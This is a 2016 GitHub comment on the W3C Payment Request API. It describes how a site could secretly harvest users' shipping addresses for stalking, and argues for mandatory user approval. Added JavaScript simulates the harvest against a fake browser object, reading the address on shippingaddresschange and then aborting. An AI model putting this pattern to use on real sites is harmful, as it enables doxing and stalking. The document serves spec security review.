Re: [w3c/browser-payment-api] What if the user refuses to supply a shipping address (#279)

I'm envisioning attacks like the following:

Some browser has a scenario where it supplies the shipping address without prompting the user, like maybe the user has only ever entered one shipping address or whatever.  

We've an adversary Steve the Stalker who likes to collect celebrities' home addresses so he can go visit them.  Steve sets up an online gossip magazine that requires buying a $0.05 subscription for most content.  Steve selects the payment app to look innocuous, appear not to need an address due to it being digital delivery, etc., but nevertheless sets that an address is required.  I doubt Steve even needs to process any payments or possess a merchant account, so he remains anonymous.

Clever twitter usage, etc. brings in the victims.  Almost nobody balks at paying $0.05 with a payment app that normally looks pretty secure, due to using some tokenizations or whatever.  Certainly some notice that an address is required, either because their browser asks for a first shipping address, or because it asks them to pick one, or because they use a better browser.  But plenty fall into the scenario where no shipping address prompt occurs.

This is a completely realistic attack.  There were some Russians who doxed a bunch of Russian porn stars recently.  And most celebrities google themselves to see what is being said about them.

I think we really need a firm principle that no personal information is ever supplied without the user being reminded of that information and approving it.  Yes, I know ordinary form auto-complete already violates that principle, but some people do turn it off for that reason, and that's not a reason to make this spec insecure.  Yes, I know the attack still works if people get into the habit of clicking OK too quickly, but that's still a big reduction.

-- 
You are receiving this because you are subscribed to this thread.
Reply to this email directly or view it on GitHub:
https://github.com/w3c/browser-payment-api/issues/279#issuecomment-248449300

Received on Tuesday, 20 September 2016 22:06:23 UTC
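The harvest pattern the comment describes, written out as an added example against the Payment Request API surface of that era (`PaymentRequest`, the `requestShipping` option, the `shippingaddresschange` event, `request.shippingAddress`, `abort()`). This is not code from the thread or from the spec; `FakePaymentRequest` and `STORED_ADDRESS` are constructed stand-ins for a browser that holds exactly one shipping address and supplies it without prompting, so the example runs outside a browser. The point it shows that the prose does not: the address reaches page script on the `shippingaddresschange` event, before the user has authorised anything, and the page can `abort()` and walk away without a merchant account ever processing a payment.

```javascript
// Constructed sample address: what the stand-in user agent has on file.
const STORED_ADDRESS = {
  recipient: 'A. Celebrity',
  addressLine: ['1 Example Close'],
  city: 'Springfield',
  postalCode: '00000',
  country: 'US',
};

// Stand-in for a browser's PaymentRequest that auto-supplies its only stored
// shipping address when requestShipping is set. Assumption for this example,
// not a real browser implementation; it models the no-prompt scenario only.
class FakePaymentRequest {
  constructor(methodData, details, options = {}) {
    this.methodData = methodData;
    this.details = details;
    this.options = options;
    this.shippingAddress = null; // populated by the UA, readable by the page
    this.listeners = {};
    this.aborted = false;
    this.completed = false; // would become true only after a real payment
  }
  addEventListener(type, fn) {
    if (!this.listeners[type]) this.listeners[type] = [];
    this.listeners[type].push(fn);
  }
  show() {
    return new Promise((resolve, reject) => {
      this._reject = reject;
      if (this.options.requestShipping) {
        // The UA fills in its single address and fires the event before the
        // user has approved anything. This is the leak the comment describes.
        this.shippingAddress = { ...STORED_ADDRESS };
        const ev = { updateWith: () => {} };
        for (const fn of this.listeners.shippingaddresschange || []) fn(ev);
      }
      // A real UA resolves only once the user accepts; here we never resolve,
      // because the attacker aborts first.
    });
  }
  abort() {
    this.aborted = true;
    this._reject(new Error('AbortError'));
    return Promise.resolve();
  }
}

// The attacker's page script. Digital goods, nominal price, but requestShipping
// is set anyway; the address is copied out of the change event and the sheet
// is aborted, so no payment is ever processed.
async function harvestAddress(PaymentRequestCtor) {
  const methodData = [{ supportedMethods: ['basic-card'] }]; // 2016-era shape
  const details = {
    total: { label: 'Gossip subscription', amount: { currency: 'USD', value: '0.05' } },
  };
  const request = new PaymentRequestCtor(methodData, details, { requestShipping: true });

  let leaked = null;
  request.addEventListener('shippingaddresschange', (ev) => {
    leaked = { ...request.shippingAddress }; // exfiltrate here in a real attack
    ev.updateWith(Promise.resolve(details)); // keep the sheet consistent
    request.abort();                          // then walk away
  });

  try {
    await request.show();
  } catch (e) {
    // AbortError is expected; the merchant never needed to take money.
  }
  return { leaked, paymentCompleted: request.completed, aborted: request.aborted };
}

// Stand-alone run: prints the harvested address and confirms no payment occurred.
harvestAddress(FakePaymentRequest).then((r) => {
  console.log('harvested:', r.leaked, 'paymentCompleted:', r.paymentCompleted);
});
```

The fix the comment argues for lives in the user agent, not the page: a UA that prompts (or at least re-displays the address for approval) before firing `shippingaddresschange` leaves this script with nothing to read. The stand-in above can be switched to that behaviour by having `show()` withhold `shippingAddress` until an explicit approval step.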